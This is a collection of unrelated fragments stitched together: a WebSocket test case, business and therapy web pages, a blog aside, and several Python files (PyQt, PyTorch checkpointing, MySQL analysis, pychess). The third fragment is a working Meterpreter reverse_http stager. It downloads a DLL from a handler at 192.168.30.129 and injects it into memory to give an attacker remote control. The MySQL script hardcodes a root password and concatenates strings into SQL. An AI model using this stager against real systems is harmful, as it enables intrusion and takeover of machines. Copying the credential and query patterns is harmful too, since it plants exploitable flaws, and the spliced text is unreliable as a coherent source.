    DESCRIPTION = """Send binary message with payload of length 64 * 2**10 (64k)."""

    EXPECTATION = """Receive echo'ed binary message (with payload as sent)."""

    def init(self):
        # Total payload length of the outgoing frame (64 KiB).
        self.DATALEN = 64 * 2**10
        # Byte pattern repeated by the framer to fill DATALEN bytes.
        self.PAYLOAD = "\x00\xfe\x23\xfa\xf0"
        # Seconds to wait for the echo before giving up.
        self.WAITSECS = 10
        # Include round-trip timing in the generated report.
        self.reportTime = True

    def onOpen(self):
        # Disable the wire log while the large frame is in flight to keep
        # the report size manageable; re-enabled once the echo arrives.
        self.p.createWirelog = False
        # Assume failure until the correct echo is observed.
        self.behavior = Case.FAILED
        self.expectedClose = {"closedByMe": True, "closeCode": [self.p.CLOSE_STATUS_CODE_NORMAL], "requireClean": True}
        self.result = "Did not receive message within %d seconds." % self.WAITSECS
        # opcode 2 == binary frame; the framer repeats PAYLOAD up to DATALEN.
        self.p.sendFrame(opcode = 2, payload = self.PAYLOAD, payload_len = self.DATALEN)
        # Safety net: force-close the connection if no echo arrives in time.
        self.p.closeAfter(self.WAITSECS)

    def onMessage(self, msg, binary):
        if not binary:
            self.result = "Expected binary message with payload, but got text."
        elif len(msg) != self.DATALEN:
            self.result = "Expected binary message with payload of length %d, but got %d." % (self.DATALEN, len(msg))
        else:
            ## FIXME : check actual content
            ##
            self.behavior = Case.OK
            self.result = "Received binary message of length %d." % len(msg)
        # Restore wire logging and close the session normally.
        self.p.createWirelog = True
        self.p.sendClose(self.p.CLOSE_STATUS_CODE_NORMAL)
|
This is a placeholder page for Harry Purdy, which means this person is not currently on this site. We do suggest using the tools below to find Harry Purdy.
You are visiting the placeholder page for Harry Purdy. This page is here because someone used our placeholder utility to look for Harry Purdy. We created this page automatically in hopes Harry Purdy would find it. If you are not Harry Purdy, but are an alumnus of Baxter Springs High School, register on this site for free now.
|
#
# Python windows/meterpreter/reverse_http stager
# (doesn't rely on shellcode)
#
# By: @harmj0y
#
import httplib, string, random, struct, ctypes, time
# helper for the metasploit http checksum algorithm
def checksum8(s):
# hard rubyish way -> return sum([struct.unpack('<B', ch)[0] for ch in s]) % 0x100
return sum([ord(ch) for ch in s]) % 0x100
# generate a metasploit http handler compatible checksum for the URL
def genHTTPChecksum():
chk = string.ascii_letters + string.digits
for x in xrange(64):
uri = "".join(random.sample(chk,3))
r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for char in r:
if checksum8(uri + char) == 92:
return uri + char
def connect():
# establish a HTTPS connection to the metasploit handler
c = httplib.HTTPSConnection("192.168.30.129", 443)
# get our checksumed resource
c.request("GET", "/" + genHTTPChecksum() )
response = c.getresponse()
# only return data if it was http code 200
if response.status == 200: return response.read()
else: return ""
# injects the meterpreter .dll into memory
def inject(dll):
# make sure we have something to inject
if dll != "":
# read in the meterpreter .dll and convert it to a byte array
shellcode = bytearray(dll)
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
# use virtuallock to lock region for physical address space
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(shellcode)))
# read in the buffer
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# moved the memory in 4 byte blocks
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
# launch in a thread
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
# waitfor singleobject
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
html = connect()
inject(html)
|
Grace Givers Home Care LLC was founded in 2017 by Kelli Grace Tipton, who was age 26 at the time. Kelli had been involved in home care for approximately 8 years at the time. She had worked as a caregiver herself, and also had years of experience in supervisory roles in home care and hospice settings. Kelli’s decision to begin Grace-Givers Home Care was reached after she and her family had struggled to find quality, dependable home care service for her grandmother, who was terminally ill.
Grace Givers has quickly become the “go to” source for home care on the Cumberland Plateau, and was recognized by the Crossville-Cumberland County Chamber of Commerce as the 2018 Business of the Year, with a team of over 50.
In January of 2018 they opened the only State Licensed Adult Day Center in Crossville, at their Peavine Road Location to serve those who would like to receive goal oriented care in a group setting.
which has become our full operational protocol in every aspect of the company.
To be: Genuine, Respectful, Adaptable, Considerate,and Empathetic.
We are not simply a “sitter service”. All of our Grace Givers are thoroughly trained and competent in hands-on care (assistance with bathing, toileting, dressing, etc.) as well as the basic light housekeeping, meal prep, and other household management tasks we offer. Our pre-hire screenings and processing go far beyond the basic state requirements for hiring caregivers, so that you or your loved one will receive the most reliable, trustworthy care possible.
Grace Givers Home Care is a Certified Economically Disadvantaged Woman Owned Small Business. We strive to keep a happy, healthy work environment for all of our team members, with competitive wages. This helps us to recruit, and hold onto the best of the best.
Being born and raised in the Upper Cumberland, I’ve seen things evolve for the better, and I want to do my part to help bring that change to its fullest potential. I hope to create careers, and not just “jobs”, along with upholding a trusted, local company that can assist with the upcoming “aging boom” that is beginning to take place. Leaders in our area and state work hard to recruit retirees to our area, and we have to make sure we have the capacity and quality of care to assist those who have decided to spend their Golden Years with us, as well as those who have lived and worked here all their lives, and helped to make it what it is today. My hope is to provide easily accessible, affordable, quality, and dependable service for everyone in the community who may need it, whether it be a new mom, or someone with only days to live.
With Grace Giver’s, you can rest assured you or your loved one will receive the best care around!
We are available 24/7 to answer any questions you may have regarding home care for you or your loved one. We don’t believe in answering services here–just highly trained, local experts!
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from gen.ui_main_view import Ui_MainView
from views.component_view import ComponentView
from views.task_view import TaskView
# from views.component_main_window import ComponentMainWindow
# from views.routine_widget import RoutineWidget
from models import model
class MainView(QtGui.QMainWindow):
    """Main application window: a menu bar, an MDI area for component/task
    sub-windows, and two dock widgets listing the available components and
    tasks."""

    def __init__(self, model, comp_ctrl, task_ctrl):
        super(MainView, self).__init__(None)

        # Shared application model plus the two controllers that turn
        # tree-view selections into component/task model objects.
        self.model = model
        self.comp_ctrl = comp_ctrl
        self.task_ctrl = task_ctrl

        self.build_ui()

    def build_ui(self):
        """Instantiate the Designer-generated UI and wire up all widgets."""
        self.ui = Ui_MainView()
        self.ui.setupUi(self)

        # self.build_subwindows()
        # self.ui.action_routine_editor.triggered.connect(self.on_window_routine_editor)

        self.build_menu_bar()
        self.build_comps_dockwidget()
        self.build_tasks_dockwidget()

        self.ui.action_open_task.triggered.connect(self.on_open_task)

    def build_menu_bar(self):
        # Only the "About" action is wired here; other menu actions are
        # connected in build_ui().
        self.ui.action_about.triggered.connect(self.show_about)

    def show_about(self):
        """Show the About box with the application name, version and URL."""
        QtGui.QMessageBox.information(self, model.APP_NAME, '{} v{}\n\n{}'.format(model.APP_NAME,
                                                                                 model.APP_VERSION,
                                                                                 model.APP_URL))

    def on_open_task(self):
        # NOTE(review): debug-only handler — just prints the currently
        # active window/sub-window/widget to stdout.
        print self.model.app.activeWindow()
        print self.ui.mdiArea.activeSubWindow()
        print self.ui.mdiArea.focusWidget()
        print ''

    def build_comps_dockwidget(self):
        """Populate the read-only tree of available components and hook up
        double-click to open a component sub-window."""
        self.ui.treeView_comps_available.setModel(self.model.comps_available_model)
        self.ui.treeView_comps_available.setHeaderHidden(True)
        self.ui.treeView_comps_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
        self.ui.treeView_comps_available.expandAll()
        self.ui.treeView_comps_available.doubleClicked.connect(self.test2)

    def build_tasks_dockwidget(self):
        """Populate the read-only tree of available tasks and hook up
        double-click to open a task sub-window."""
        self.ui.treeView_tasks_available.setModel(self.model.tasks_available_model)
        self.ui.treeView_tasks_available.setHeaderHidden(True)
        self.ui.treeView_tasks_available.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
        self.ui.treeView_tasks_available.expandAll()
        self.ui.treeView_tasks_available.doubleClicked.connect(self.test)

    def test2(self, index):
        # make a new component subwindow for the double-clicked tree item
        comp = self.comp_ctrl.create_comp(index)
        if comp is not None:
            self.new_comp_subwindow(comp)

    def test(self, index):
        # make a new task subwindow for the double-clicked tree item
        task = self.task_ctrl.create_task(index)
        if task is not None:
            self.new_task_subwindow(task)

    def new_comp_subwindow(self, comp, params=None):
        """Wrap *comp* in a ComponentView and add it to the MDI area."""
        self.comp_view = ComponentView(self, comp)
        self.ui.mdiArea.addSubWindow(self.comp_view)
        self.comp_view.show()

    def new_task_subwindow(self, task, params=None):
        """Wrap *task* in a TaskView and add it to the MDI area."""
        self.task_view = TaskView(self, task)
        self.ui.mdiArea.addSubWindow(self.task_view)
        self.task_view.show()

        # self.task_widget = TaskWidget(self, task)
        #
        # # sub_window = QtGui.QMdiSubWindow()
        # # sub_window.setWidget(task_widget)
        #
        # # w = QtGui.QWidget(self)
        # #
        # # w.add
        # #
        # # # w.move(300, 300)
        # # w.setWindowTitle('Simple')
        # # w.show()
        #
        #
        # _ = self.ui.mdiArea.addSubWindow(self.task_widget)
        #
        # print 'ere'

    # FormWidget.show()
    # class FormWidget(QtGui.QWidget):
    #     def __init__(self, parent):
    #         super(FormWidget, self).__init__(parent)
    #         self.layout = QtGui.QVBoxLayout(self)
    #
    #         self.button1 = QtGui.QPushButton("Button 1")
    #         self.layout.addWidget(self.button1)
    #
    #         self.button2 = QtGui.QPushButton("Button 2")
    #         self.layout.addWidget(self.button2)
    #
    #         self.setLayout(self.layout)
    #
    #

    def build_subwindows(self):
        # pass
        # samples
        # self.ui.mdiArea.closeAllSubWindows()

        # NOTE(review): TaskWidget's import is commented out at the top of
        # the file, so calling this method would raise NameError; it looks
        # like sample/dead code kept for reference — confirm before use.
        self.task_widget = TaskWidget(self, None)
        _ = self.ui.mdiArea.addSubWindow(self.task_widget)
        # self.task_widget.activateWindow()
        self.task_widget.show()

        #
        # self.task_widget2 = TaskWidget(self)
        # self.task_widget2.setWindowTitle('hello!')
        # _ = self.ui.mdiArea.addSubWindow(self.task_widget2)
        #
        # # try putting a main window in a sub window
        # self.component_main_window = ComponentMainWindow(self)
        # _ = self.ui.mdiArea.addSubWindow(self.component_main_window)
        # # self.component_main_window.show()
        #
        # self.routine_widget = RoutineWidget(self)
        # _ = self.ui.mdiArea.addSubWindow(self.routine_widget)

        # self.routine_editor = RoutineEditor(self)
        # flags = self.routine_editor.windowFlags()
        # # self.routine_editor.setWindowFlags(flags | QtCore.Qt.WindowStaysOnTopHint)
        # # self.routine_editor.setWindowModality(QtCore.Qt)
        #
        # def on_window_routine_editor(self, checked):
        #     if checked:
        #         self.routine_editor.show()
        #     else:
        #         self.routine_editor.hide()
|
Mentalization-Based Treatment (MBT) is an evidence-based approach developed by British clinicians Peter Fonagy and Anthony Bateman for individuals struggling with Borderline Personality Disorder. Although MBT grew out of a psychodynamic/psychoanalytic approach, it also integrates aspects of contemporary attachment theory, mindfulness, and cognitive behavioral approaches.
Can I be helped by MBT?
Mentalization Based Treatment was originally designed for individuals experiencing symptoms of Borderline Personality Disorder (BPD). Today, however, MBT has broader application for treating adolescents, families and couples who find being in relationships extremely tumultuous and difficult. MBT focuses on helping individuals develop the capacity to think about and deal with difficult emotions in stressful (interpersonal) situations.
Karen A. McCauley has additional intensive training in Mentalization-Based Treatment. She works with individuals and couples who find that being in relationships can mean intense emotional swings.
|
"""Tools to save/restore model from checkpoints."""
import argparse
import sys
import os
import torch
import re
import json
# Matches on-disk checkpoint files like "checkpoint-00000042"; group 1 is the
# zero-padded step number. Raw string avoids the invalid "\d" escape that a
# plain string literal produces (a DeprecationWarning since Python 3.6).
CHECKPOINT_PATTERN = re.compile(r'^checkpoint-(\d+)$')
class ArgsDict(dict):
    """Dictionary whose entries are also readable/writable as attributes.

    ``ArgsDict(lr=0.1).lr == ArgsDict(lr=0.1)['lr']`` — convenient for
    treating a bag of hyperparameters like an argparse namespace.
    """

    def __init__(self, **kwargs):
        super(ArgsDict, self).__init__()
        self.update(kwargs)
        # Alias the instance's attribute dict to the mapping itself, so
        # attribute access and item access share one storage.
        self.__dict__ = self
def load_checkpoint(model, optimizer, model_dir, map_to_cpu=False, step=None):
    """Load model/optimizer state from ``model_dir``.

    Reads ``model_dir/checkpoint`` (or ``checkpoint-<step>`` when *step*
    is given), back-filling any parameters missing from the file with the
    model's current values so partially matching checkpoints still load.

    Returns:
        The training step stored in the checkpoint, or 0 when the
        checkpoint does not exist or records no step.
    """
    path = os.path.join(model_dir, 'checkpoint')
    if step is not None:
        path += '-{:08d}'.format(step)
    if not os.path.exists(path):
        return 0

    print("Loading model from %s" % path)
    if map_to_cpu:
        # Force all storages onto the CPU (e.g. a GPU-trained checkpoint
        # loaded on a CPU-only machine).
        checkpoint = torch.load(
            path, map_location=lambda storage, location: storage)
    else:
        checkpoint = torch.load(path)

    # Back-fill parameters the checkpoint lacks with the current values,
    # so load_state_dict() does not fail on missing keys.
    current = model.state_dict()
    for name in current.keys():
        if name not in checkpoint['model']:
            checkpoint['model'][name] = current[name]
    model.load_state_dict(checkpoint['model'])
    optimizer.load_state_dict(checkpoint['optimizer'])
    return checkpoint.get('step', 0)
def load_and_map_checkpoint(model, model_dir, remap):
    """Load selected parameters from another model's checkpoint.

    Args:
        model: Module to (partially) initialize.
        model_dir: Directory containing a ``checkpoint`` file.
        remap: dict mapping this model's parameter names to the names
            used in the other model's checkpoint.
    """
    path = os.path.join(model_dir, 'checkpoint')
    print("Loading parameters %s from %s" % (remap.keys(), model_dir))
    checkpoint = torch.load(path)

    # Start from the current state and override only the remapped entries.
    state = model.state_dict()
    for target_name, source_name in remap.items():
        # TODO: smarter mapping.
        state[target_name] = checkpoint['model'][source_name]
    model.load_state_dict(state)
def save_checkpoint(model, optimizer, step, model_dir, ignore=(),
                    keep_every_n=10000000):
    """Save model and optimizer state as ``model_dir/checkpoint-<step>``.

    Also repoints the ``checkpoint`` symlink at the new file and culls old
    checkpoints, keeping roughly one every ``keep_every_n`` steps.

    Args:
        model: Module whose ``state_dict()`` is saved.
        optimizer: Optimizer whose ``state_dict()`` is saved.
        step: Current training step (zero-padded into the filename).
        model_dir: Output directory; created if missing.
        ignore: Iterable of parameter-name prefixes to omit from the
            saved model state (default: keep everything).
        keep_every_n: Minimum step spacing between retained old
            checkpoints; pass None to disable culling.
    """
    if not os.path.exists(model_dir):
        os.makedirs(model_dir)
    path = os.path.join(model_dir, 'checkpoint')
    step_padded = format(step, '08d')
    state_dict = model.state_dict()
    if ignore:
        # Iterate over a snapshot of the keys: popping from a dict while
        # iterating its live key view raises RuntimeError in Python 3.
        for key in list(state_dict.keys()):
            for item in ignore:
                if key.startswith(item):
                    state_dict.pop(key)
                    break  # key already removed; don't pop it twice
    torch.save({
        'model': state_dict,
        'optimizer': optimizer.state_dict(),
        'step': step
    }, '{}-{}'.format(path, step_padded))
    # Refresh the 'checkpoint' symlink to point at the newest file.
    if os.path.exists(path):
        os.unlink(path)
    source = 'checkpoint-' + step_padded
    os.symlink(source, path)
    # Cull old checkpoints.
    if keep_every_n is not None:
        all_checkpoints = []
        for name in os.listdir(model_dir):
            m = CHECKPOINT_PATTERN.match(name)
            if m is None or name == source:
                continue
            checkpoint_step = int(m.group(1))
            all_checkpoints.append((checkpoint_step, name))
        all_checkpoints.sort()
        # Keep a checkpoint only when it is at least keep_every_n steps
        # after the previous one we kept; delete the rest.
        last_step = float('-inf')
        for checkpoint_step, name in all_checkpoints:
            if checkpoint_step - last_step >= keep_every_n:
                last_step = checkpoint_step
                continue
            os.unlink(os.path.join(model_dir, name))
class Saver(object):
    """Bundles a model/optimizer pair with checkpoint save/restore helpers."""

    def __init__(self, model, optimizer, keep_every_n=None):
        self._model = model
        self._optimizer = optimizer
        self._keep_every_n = keep_every_n

    def restore(self, model_dir, map_to_cpu=False, step=None):
        """Restore model and optimizer state from *model_dir*.

        Returns:
            The last training step recorded in the restored checkpoint
            (0 when no checkpoint exists).
        """
        return load_checkpoint(self._model, self._optimizer, model_dir,
                               map_to_cpu, step)

    def save(self, model_dir, step):
        """Write a checkpoint for training step *step* into *model_dir*."""
        save_checkpoint(self._model, self._optimizer, step, model_dir,
                        keep_every_n=self._keep_every_n)

    def restore_part(self, other_model_dir, remap):
        """Initialize part of the model from another pretrained model.

        Args:
            other_model_dir: Directory holding the other model's checkpoint.
            remap: dict mapping this model's parameter names to the other
                model's parameter names.
        """
        load_and_map_checkpoint(self._model, other_model_dir, remap)
def save_args(args):
    """Persist the argparse namespace as ``args.json`` in args.model_dir."""
    if not os.path.exists(args.model_dir):
        os.makedirs(args.model_dir)
    with open(os.path.join(args.model_dir, 'args.json'), 'w') as f:
        json.dump(vars(args), f)
def restore_args(args):
    """Fill in missing attributes of *args* from a saved ``args.json``.

    Attributes already present on *args* (e.g. set on the command line)
    take precedence and are left untouched.

    Raises:
        Exception: if ``args.model_dir`` does not exist.
    """
    if not os.path.exists(args.model_dir):
        raise Exception('{} does not exist'.format(args.model_dir))
    with open(os.path.join(args.model_dir, 'args.json')) as f:
        saved = json.load(f)
    for name, value in saved.items():
        if not hasattr(args, name):
            setattr(args, name, value)
def print_params(dct, indent=0):
    """Recursively pretty-print the contents of a checkpoint dictionary.

    Nested dicts print as a header line followed by their items indented
    two more spaces; tensors print their size; anything else prints its
    ``str`` value.
    """
    pad = " " * indent
    for key in dct:
        value = dct[key]
        if isinstance(value, dict):
            print(pad + str(key))
            print_params(value, indent + 2)
        elif isinstance(value, torch.Tensor):
            print(pad + key + " " + str(value.size()))
        else:
            print(pad + key + " = " + str(value))
if __name__ == "__main__":
    # Standalone utility: dump the contents of a checkpoint for inspection.
    parser = argparse.ArgumentParser(description='Checkpoint Viewer')
    parser.add_argument('--model_dir', type=str, default='')
    args = parser.parse_args()
    # Follows the 'checkpoint' symlink to the latest saved step.
    path = os.path.join(args.model_dir, 'checkpoint')
    print("Loading model from %s" % path)
    checkpoint = torch.load(path)
    print_params(checkpoint)
|
I'm not going to rant about politics this morning because, frankly, it's exhausting. I'm only right now, this morning. An hour from now might be different.
Well, there is this. I just got distracted looking for funny pictures of Steve Bannon and Kelly Anne Conway. There is no shortage (I'd post a few here but don't want to ruin the bread and baby mojo.) but here's a scary idea. Someone started a FB page to promote her run for the presidency in 2020. Lord have mercy.
|
import _mysql
from dealFile import *
#Get of Domains which has more than 2 interfaces have 16-20 examples
# Connect to the local DDI (domain-domain interaction) MySQL database.
# NOTE(review): queries below are built by string concatenation; safe only
# because the inputs come from a trusted local file, not user input.
db=_mysql.connect(host="localhost",user="root",passwd="zxcv4321",db="DDI")
#db.query("""select COUNT(*) from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" and topology_1 = 6 and topology_2 = 6""")
#db.query("""select * from PPI inner join example on (ID = PPI_ID) where domain1="ACT" and domain2="ACT" """)

# Candidate domain pairs: DDIs with 2 interfaces having over 15 examples.
ddiList=readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
ddis=[]
#Number of Domains which has 2 interfaces have more than 15 examples
for ddi in ddiList:
    [domain1,domain2]=ddi
    #print i
    print domain1
    print domain2
    #query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
    #query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
    # Count how many distinct interface topologies this domain pair has.
    query='SELECT COUNT(DISTINCT topology_1,topology_2) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
    #print query
    #query='select domain1,domain2 from DDI1'
    db.query(query)
    result=db.store_result()
    numTopology=result.fetch_row(0)
    #print numTopology[0][0]
    # Only pairs with more than one distinct topology are of interest.
    if int(numTopology[0][0])>1:
        Ctr=False
        query='SELECT DISTINCT topology_1,topology_2 from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'"'
        db.query(query)
        result=db.store_result()
        rTopology=result.fetch_row(0)
        numOver15=0
        # Check the example count for each distinct topology pair.
        for val in rTopology[0:]:
            [topology1,topology2]=val
            try:
                #print topology1+':'+topology2
                query='SELECT COUNT(*) from DDItopology WHERE domain1="'+domain1+'" AND domain2="'+domain2+'" AND topology_1='+topology1+' AND topology_2='+topology2
                print query
                db.query(query)
                result=db.store_result()
                numExample=result.fetch_row(0)
                print numExample[0][0]
            # NOTE(review): bare except silently abandons this domain pair
            # on any query error; numExample may also be stale/unbound below.
            except:
                break
            if int(numExample[0][0])>15:# if for those interfaces have more than 15 examples if they have less than 21 examples, add it.
                if int(numExample[0][0])>20:
                    Ctr=False
                    break
                else:
                    Ctr=True
        # Keep the pair only if the last qualifying interface stayed in the
        # 16-20 example range.
        if Ctr==True:
            ddis.append(domain1+'_int_'+domain2)
# Write out the surviving "<domain1>_int_<domain2>" identifiers.
writeListFile('listOfDDIsHaveOver2InterfacesHave15-20Examples.txt',ddis)
#print result.fetch_row()
#print r[0][0] readDDIsFile('listOfDDIsHave2InterfacesOver15.txt')
|
This entry was posted on Saturday, September 15th, 2012 at 5:29 pm and is filed under . You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
|
from __future__ import print_function
import threading
from pychess.compat import StringIO
from pychess.System.Log import log
from pychess.Utils.GameModel import GameModel
from pychess.Utils.Offer import Offer
from pychess.Utils.const import REMOTE, DRAW, WHITE, BLACK, RUNNING, WHITEWON, KILLED, \
TAKEBACK_OFFER, WON_CALLFLAG, WAITING_TO_START, BLACKWON, PAUSE_OFFER, PAUSED, \
RESUME_OFFER, DISCONNECTED, CHAT_ACTION, RESIGNATION, FLAG_CALL, OFFERS, LOCAL, \
ACTION_ERROR_NONE_TO_ACCEPT, UNFINISHED_STATES, ABORT_OFFER
from pychess.Players.Human import Human
from pychess.Savers import fen as fen_loader
from pychess.ic import GAME_TYPES, TYPE_TOURNAMENT_DIRECTOR
class ICGameModel(GameModel):
    """GameModel specialization for games played or observed on an Internet
    Chess Server (FICS).

    Relays board/clock updates, offers and chat between the server
    connection's managers (bm=board, om=offer, cm=chat) and the local game
    state, and cleans up server-side state when the game ends.
    """

    def __init__(self, connection, ficsgame, timemodel):
        assert ficsgame.game_type in GAME_TYPES.values()
        GameModel.__init__(self, timemodel, ficsgame.game_type.variant)
        self.connection = connection
        self.ficsgame = ficsgame
        self.ficsplayers = (ficsgame.wplayer, ficsgame.bplayer)
        # Set once the game widget is built; chat handlers wait on it.
        self.gmwidg_ready = threading.Event()

        # Register all server-event handlers; handler ids are recorded in
        # self.connections so __disconnect()/terminate() can detach them.
        connections = self.connections
        connections[connection.bm].append(connection.bm.connect(
            "boardUpdate", self.onBoardUpdate))
        connections[connection.bm].append(connection.bm.connect(
            "timesUpdate", self.onTimesUpdate))
        connections[connection.bm].append(connection.bm.connect(
            "obsGameEnded", self.onGameEnded))
        connections[connection.bm].append(connection.bm.connect(
            "curGameEnded", self.onGameEnded))
        connections[connection.bm].append(connection.bm.connect(
            "gamePaused", self.onGamePaused))
        connections[connection.bm].append(connection.bm.connect(
            "madeExamined", self.onMadeExamined))
        connections[connection.bm].append(connection.bm.connect(
            "madeUnExamined", self.onMadeUnExamined))
        connections[connection.om].append(connection.om.connect(
            "onActionError", self.onActionError))
        connections[connection.cm].append(connection.cm.connect(
            "kibitzMessage", self.onKibitzMessage))
        connections[connection.cm].append(connection.cm.connect(
            "whisperMessage", self.onWhisperMessage))
        connections[connection.cm].append(connection.cm.connect(
            "observers_received", self.onObserversReceived))
        connections[connection].append(connection.connect("disconnected",
                                                          self.onDisconnected))

        rated = "rated" if ficsgame.rated else "unrated"
        # This is in the format that ficsgames.org writes these PGN headers
        self.tags["Event"] = "FICS %s %s game" % (rated,
                                                  ficsgame.game_type.fics_name)
        self.tags["Site"] = "freechess.org"

    def __repr__(self):
        string = GameModel.__repr__(self)
        string = string.replace("<GameModel", "<ICGameModel")
        fics_game = repr(self.ficsgame)
        string = string.replace(", players=", ", ficsgame=%s, players=" % fics_game)
        return string

    @property
    def display_text(self):
        """Short bracketed description, e.g. '[ 5+0 rated blitz ]'."""
        text = "[ "
        if self.timed:
            text += self.timemodel.display_text + " "
        text += self.ficsgame.display_rated.lower() + " "
        if self.ficsgame.game_type.display_text:
            text += self.ficsgame.game_type.display_text + " "
        return text + "]"

    def __disconnect(self):
        """Detach all non-Human server-event handlers registered in __init__."""
        if self.connections is None:
            return
        for obj in self.connections:
            # Humans need to stay connected post-game so that "GUI > Actions" works
            if isinstance(obj, Human):
                continue
            for handler_id in self.connections[obj]:
                if obj.handler_is_connected(handler_id):
                    log.debug("ICGameModel.__disconnect: object=%s handler_id=%s" %
                              (repr(obj), repr(handler_id)))
                    obj.disconnect(handler_id)

    def ficsplayer(self, player):
        """Return the FICSPlayer corresponding to a local Player object."""
        if player.ichandle == self.ficsplayers[0].name:
            return self.ficsplayers[0]
        else:
            return self.ficsplayers[1]

    @property
    def remote_player(self):
        """The Player object that represents the opponent on the server."""
        if self.players[0].__type__ == REMOTE:
            return self.players[0]
        else:
            return self.players[1]

    @property
    def remote_ficsplayer(self):
        return self.ficsplayer(self.remote_player)

    def hasGuestPlayers(self):
        """True if either side is an unregistered (guest) account."""
        for player in self.ficsplayers:
            if player.isGuest():
                return True
        return False

    @property
    def noTD(self):
        """True unless one of the players is a tournament director bot."""
        for player in self.ficsplayers:
            if TYPE_TOURNAMENT_DIRECTOR in player.titles:
                return False
        return True

    def onBoardUpdate(self, bm, gameno, ply, curcol, lastmove, fen, wname,
                      bname, wms, bms):
        """Sync local clocks/position with a server board update.

        Handles four situations: plain clock updates, initial position or
        player-name changes (lastmove is None), takebacks (ply went
        backwards), and jumps forward (e.g. resuming an observed game).
        """
        log.debug(("ICGameModel.onBoardUpdate: id=%s self.ply=%s self.players=%s gameno=%s " +
                   "wname=%s bname=%s ply=%s curcol=%s lastmove=%s fen=%s wms=%s bms=%s") %
                  (str(id(self)), str(self.ply), repr(self.players), str(gameno), str(wname), str(bname),
                   str(ply), str(curcol), str(lastmove), str(fen), str(wms), str(bms)))
        if gameno != self.ficsgame.gameno or len(self.players) < 2:
            # LectureBot allways uses gameno 1 for many games in one lecture
            # or wname != self.players[0].ichandle or bname != self.players[1].ichandle:
            return

        log.debug("ICGameModel.onBoardUpdate: id=%d, self.players=%s: updating time and/or ply" %
                  (id(self), str(self.players)))
        if self.timed:
            log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s: updating timemodel" %
                      (id(self), str(self.players)))
            # If game end coming from helper connection before last move made
            # we have to tap() ourselves
            if self.status in (DRAW, WHITEWON, BLACKWON):
                if self.timemodel.ply < ply:
                    self.timemodel.paused = False
                    self.timemodel.tap()
                    self.timemodel.paused = True
            self.timemodel.updatePlayer(WHITE, wms / 1000.)
            self.timemodel.updatePlayer(BLACK, bms / 1000.)

        if lastmove is None:
            # No move attached: either the initial board or a rename.
            if bname != self.tags["Black"]:
                self.tags["Black"] = self.players[
                    BLACK].name = self.ficsplayers[BLACK].name = bname
                self.emit("players_changed")
            if wname != self.tags["White"]:
                self.tags["White"] = self.players[
                    WHITE].name = self.ficsplayers[WHITE].name = wname
                self.emit("players_changed")
            if self.boards[-1].asFen() != fen:
                # Position differs from ours: reload from the server's FEN.
                self.status = RUNNING
                self.loadAndStart(
                    StringIO(fen),
                    fen_loader,
                    0,
                    -1,
                    first_time=False)
                self.emit("game_started")
                curPlayer = self.players[self.curColor]
                curPlayer.resetPosition()
        elif ply < self.ply:
            log.debug("ICGameModel.onBoardUpdate: id=%d self.players=%s \
                      self.ply=%d ply=%d: TAKEBACK" %
                      (id(self), str(self.players), self.ply, ply))
            for offer in list(self.offers.keys()):
                if offer.type == TAKEBACK_OFFER:
                    # There can only be 1 outstanding takeback offer for both players on FICS,
                    # (a counter-offer by the offeree for a takeback for a different number of
                    # moves replaces the initial offer) so we can safely remove all of them
                    del self.offers[offer]

            # In some cases (like lost on time) the last move is resent
            # or we just observing an examined game
            if self.reason != WON_CALLFLAG:
                if len(self.moves) >= self.ply - ply:
                    self.undoMoves(self.ply - ply)
                else:
                    self.status = RUNNING
                    self.loadAndStart(
                        StringIO(fen),
                        fen_loader,
                        0,
                        -1,
                        first_time=False)
                    self.emit("game_started")
                    curPlayer = self.players[self.curColor]
                    curPlayer.resetPosition()
        elif ply > self.ply + 1:
            # We missed at least one move (e.g. network hiccup); resync from FEN.
            self.status = RUNNING
            self.loadAndStart(
                StringIO(fen),
                fen_loader,
                0,
                -1,
                first_time=False)
            self.emit("game_started")
            curPlayer = self.players[self.curColor]
            curPlayer.resetPosition()

    def onTimesUpdate(self, bm, gameno, wms, bms):
        """Update both clocks from server times given in milliseconds."""
        if gameno != self.ficsgame.gameno:
            return
        if self.timed:
            self.timemodel.updatePlayer(WHITE, wms / 1000.)
            self.timemodel.updatePlayer(BLACK, bms / 1000.)

    def onMadeExamined(self, bm, gameno):
        self.examined = True

    def onMadeUnExamined(self, bm, gameno):
        self.examined = False

    def onGameEnded(self, bm, ficsgame):
        if ficsgame == self.ficsgame and len(self.players) >= 2:
            log.debug(
                "ICGameModel.onGameEnded: self.players=%s ficsgame=%s" %
                (repr(self.players), repr(ficsgame)))
            self.end(ficsgame.result, ficsgame.reason)

    def setPlayers(self, players):
        GameModel.setPlayers(self, players)
        # Record server ratings in the PGN tags when available.
        if self.players[WHITE].icrating:
            self.tags["WhiteElo"] = self.players[WHITE].icrating
        if self.players[BLACK].icrating:
            self.tags["BlackElo"] = self.players[BLACK].icrating

    def onGamePaused(self, bm, gameno, paused):
        if paused:
            self.pause()
        else:
            self.resume()

